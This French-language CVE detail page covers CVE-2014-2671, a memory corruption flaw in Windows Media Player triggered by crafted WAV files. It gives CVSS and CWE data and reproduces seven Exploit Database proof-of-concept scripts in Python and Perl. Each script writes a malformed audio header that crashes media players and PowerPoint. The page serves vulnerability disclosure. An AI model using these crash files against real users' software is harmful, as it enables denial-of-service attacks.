CVE-2014-2671 : Détail

CVE-2014-2671

Overflow
5.43%V3
Network
2014-03-30
08h00 +00:00
2017-08-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Windows Media Player (WMP) 11.0.5721.5230 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted WAV file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 32482

Date de publication : 2014-03-23 23h00 +00:00
Auteur : TUNISIAN CYBER
EDB Vérifié : Yes

#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: GOMMP 2.2.56.5183 Memory Corruption PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://player.gomlab.com/eng/ #[+] Friendly Sites: na3il.com,th3-creative.com #[+] Twitter: @TCYB3R print"###########################################################" print"# Title: GOMMP 2.2.56.5183 Memory Corruption PoC #" print"# Author: TUNISIAN CYBER #" print"# Category: DoS/PoC # " print"###########################################################" header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "3vil.wav" file = open(filename , "w") file.write(header) print "\n Done!\n" file.close()
Exploit Database EDB-ID : 32483

Date de publication : 2014-03-23 23h00 +00:00
Auteur : TUNISIAN CYBER
EDB Vérifié : Yes

#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: GOM Video Converter 1.1.0.60 Memory Corruption PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://converter.gomlab.com/ #[+] Friendly Sites: na3il.com,th3-creative.com #[+] Twitter: @TCYB3R print"###########################################################" print"# Title: GOMVC 1.1.0.60 Memory Corruption PoC #" print"# Author: TUNISIAN CYBER #" print"# Category: DoS/PoC # " print"###########################################################" header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "3vil.wav" file = open(filename , "w") file.write(header) print "\n Done!\n" file.close()
Exploit Database EDB-ID : 32478

Date de publication : 2014-03-23 23h00 +00:00
Auteur : TUNISIAN CYBER
EDB Vérifié : Yes

#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: jetVideo 8.1.1 Basic (.wav) Local Crash PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://www.jetaudio.com/download/jetvideo.html #[+] Friendly Sites: na3il.com,th3-creative.com #[+] Twitter: @TCYB3R import os os.system("color 02") print"###########################################################" print"# Title: Light jetVideo 8.1.1 Basic (.wav) Local Crash PoC#" print"# Author: TUNISIAN CYBER #" print"# Category: DoS/PoC # " print"###########################################################" header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "jet.wav" file = open(filename , "w") file.write(header) print "\n Files Created!\n" file.close()
Exploit Database EDB-ID : 32481

Date de publication : 2014-03-23 23h00 +00:00
Auteur : TUNISIAN CYBER
EDB Vérifié : Yes

#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html #[+] Friendly Sites: na3il.com,th3-creative.com #[+] Twitter: @TCYB3R import os os.system("color 02") print"###########################################################" print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #" print"# Author: TUNISIAN CYBER #" print"# Category: DoS/PoC # " print"###########################################################" header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "3vil.wav" file = open(filename , "w") file.write(header) print "\n Files Created!\n" file.close()
Exploit Database EDB-ID : 26517

Date de publication : 2013-06-30 22h00 +00:00
Auteur : Asesino04
EDB Vérifié : Yes

# Title : Microsoft Office PowerPoint 2007 Crash PoC # Date: 2013-01-12 # Software Link: http://office.microsoft.com/ # Author: Asesino04 # Tested on: Windows XP SP2 # Special Thanks To : Ness Oum El Bouaghi # Bug Description: when you insert a sound to Microsoft office powerpoint 2007 ;the software will get crashed it tested on office 2007 ,all the versions may be affected too # Credit: This Bug was founded by Asesino04 "The Black Devils" # Proof Of Concept https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/601368_541967942509686_881180451_n.jpg /--> EAX FFFFFFFF ECX 00000000 EDX 00000000 EBX 0003DAD8 ESP 0013BC5C EBP 0013BCF0 ESI FFFFFFFF EDI 00199FF2 EIP 0460E650 quartz.0460E650 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty -??? FFFF 00FF00FF 00FF00FF ST1 empty -??? FFFF 00FF00FF 00FF00FF ST2 empty 0.0 ST3 empty 0.0000721784745110199 ST4 empty 2902527.2727272720080 ST5 empty -0.0 ST6 empty 41.943754053320141400 ST7 empty 0.0 3 2 1 0 E S P U O Z D I FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 <--/ #!/usr/bin/perl system("title The Black Devils"); system("color 1e"); system("cls"); print "\n\n"; print " |=======================================================|\n"; print " |= [!] Name : Microsoft Office PowerPoint 2007 ||.au =|\n"; print " |= [!] Exploit : Crash PoC =|\n"; print " |= [!] Author : Asesino04 =|\n"; print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n"; print " |=======================================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01". "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E". "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22". "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00"; open(file , ">", "inj3ctor.au"); # Evil File au 284 Octets print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! "; close(file); ----------- Contact: # Youtube : www.youtube.com/user/Th3BlackDevils # Facebook : www.facebook.com/DevilsDz # Email : mr.k4rizma@gmail.com
Exploit Database EDB-ID : 32477

Date de publication : 2014-03-23 23h00 +00:00
Auteur : TUNISIAN CYBER
EDB Vérifié : Yes

#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://windows.microsoft.com/fr-FR/windows/windows-media-player #[+] Friendly Sites: na3il.com,th3-creative.com #[+] Twitter: @TCYB3R import os os.system("color 02") print"###########################################################" print"# Title: WMP 11.0.5721.5230 Memory Corruption PoC #" print"# Author: TUNISIAN CYBER #" print"# Category: DoS/PoC # " print"###########################################################" header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "ms.wav" file = open(filename , "w") file.write(header) print "\n Files Created!\n" file.close()
Exploit Database EDB-ID : 26951

Date de publication : 2013-07-17 22h00 +00:00
Auteur : ariarat
EDB Vérifié : No

# Exploit Title: Windows Movie Maker Version 2.1.4026.0 (.wav) - Crash POC # Date: 16-07-2013 # Exploit Author: ariarat # Vendor Homepage: http://www.microsoft.com # Software Link: included in windows xp sp2 and sp3 # Version: 2.1.4026.0 # Tested on: [ Windows XP sp3] # CVE : 2013-4858 #============================================================================================ # Open Windows movie maker in left panel click on "Import audio or music" and choose movieMaker.wav # #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "movieMaker.wav" file = open(filename , "w") file.write(string) file.close()

Products Mentioned

Configuraton 0

Microsoft>>Windows_media_player >> Version 11.0.5721.5230

Références

http://www.exploit-db.com/exploits/32477/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/66403
Tags : vdb-entry, x_refsource_BID